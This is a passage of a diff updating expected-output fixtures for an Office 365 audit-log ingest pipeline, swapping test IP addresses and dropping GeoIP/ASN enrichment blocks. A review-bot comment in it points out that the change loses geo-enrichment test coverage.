APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -12405,25 +11343,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -12437,7 +11357,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -12573,7 +11493,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
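Review bot: The new expected output for this event keeps only `source.ip` and drops the `source.geo` and `source.as` blocks the old fixture carried, so the test no longer asserts that the pipeline's GeoIP/ASN enrichment ran; the same pattern repeats in the `@@ -12616,25` and `@@ -12827,25` hunks below. If 67.43.156.15 is an address the test GeoIP database resolves, the fixture was probably regenerated against a stack without that database and should be regenerated again; if it is not resolvable, a sentence in the PR description saying the geo coverage is intentionally dropped would help the next maintainer. Either way, consider keeping at least one event whose expected `source.geo` block is populated so a silently broken geoip processor is still caught by the pipeline test.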
@@ -12585,12 +11505,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036429500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125185500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -12616,25 +11536,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -12648,7 +11550,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -12784,7 +11686,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -12796,12 +11698,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036434300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125190800Z", + "original": 
